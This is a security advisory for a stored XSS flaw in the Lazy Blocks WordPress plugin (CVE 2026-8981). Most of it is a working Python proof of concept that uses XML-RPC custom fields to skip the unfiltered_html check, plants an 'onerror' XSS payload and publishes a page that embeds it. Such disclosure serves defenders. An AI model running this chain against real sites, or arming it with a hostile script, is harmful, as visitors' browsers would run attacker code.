Lazy Blocks < 4.3.0 – Admin+ Stored XSS via Custom Block Frontend HTML | CVE 2026-8981

Description

The plugin does not consistently check the unfiltered_html capability across all paths that write to its block template code fields, allowing administrators on multisite installations (or single-site installs with DISALLOW_UNFILTERED_HTML defined) to inject arbitrary JavaScript that executes for any visitor of pages embedding the affected block.

Proof of Concept

#!/usr/bin/env python3
"""
PoC — Custom Block Builder – Lazy Blocks <= 4.2.1
Admin+ Stored XSS via XML-RPC custom_fields bypassing unfiltered_html.

Prerequisites:
  - Target runs WordPress multisite (or single-site with DISALLOW_UNFILTERED_HTML).
  - Lazy Blocks plugin is installed and activated.
  - The attacker account has the Administrator role but lacks the
    unfiltered_html capability (the default for Admins on multisite).
  - XML-RPC is enabled (default in WordPress).
"""
import ssl
import xmlrpc.client

TARGET   = 'https://example.com/xmlrpc.php'   # target
USERNAME = 'admin'
PASSWORD = 'password'

ctx = ssl._create_unverified_context()
proxy = xmlrpc.client.ServerProxy(TARGET, context=ctx)
proxy.wp.getUsersBlogs(USERNAME, PASSWORD)

# 1) Create a Lazy Blocks custom block and write the XSS payload into the
#    `lazyblocks_code_frontend_html` post meta via the custom_fields argument.
#    This path calls add_post_meta() directly, bypassing the plugin's
#    editor-side unfiltered_html check.
block_id = proxy.wp.newPost('', USERNAME, PASSWORD, {
    'post_type':    'lazyblocks',
    'post_status':  'publish',
    'post_title':   'XSS PoC Block',
    'custom_fields': [
        {'key': 'lazyblocks_slug',               'value': 'xss-poc-block'},
        {'key': 'lazyblocks_code_frontend_html', 'value': '<img src=x onerror=alert(1)>'},
        {'key': 'lazyblocks_code_output_method', 'value': 'html'},
        {'key': 'lazyblocks_category',           'value': 'text'},
    ],
})

# 2) Create a page that embeds the malicious block.
page_id = proxy.wp.newPost('', USERNAME, PASSWORD, {
    'post_type':    'page',
    'post_status':  'publish',
    'post_title':   'XSS PoC Page',
    'post_content': '<!-- wp:lazyblock/xss-poc-block -->test<!-- /wp:lazyblock/xss-poc-block -->',
})

print(f'Block ID: {block_id}')
print(f'Page ID:  {page_id}')
print('Open the page in any browser to trigger the XSS.')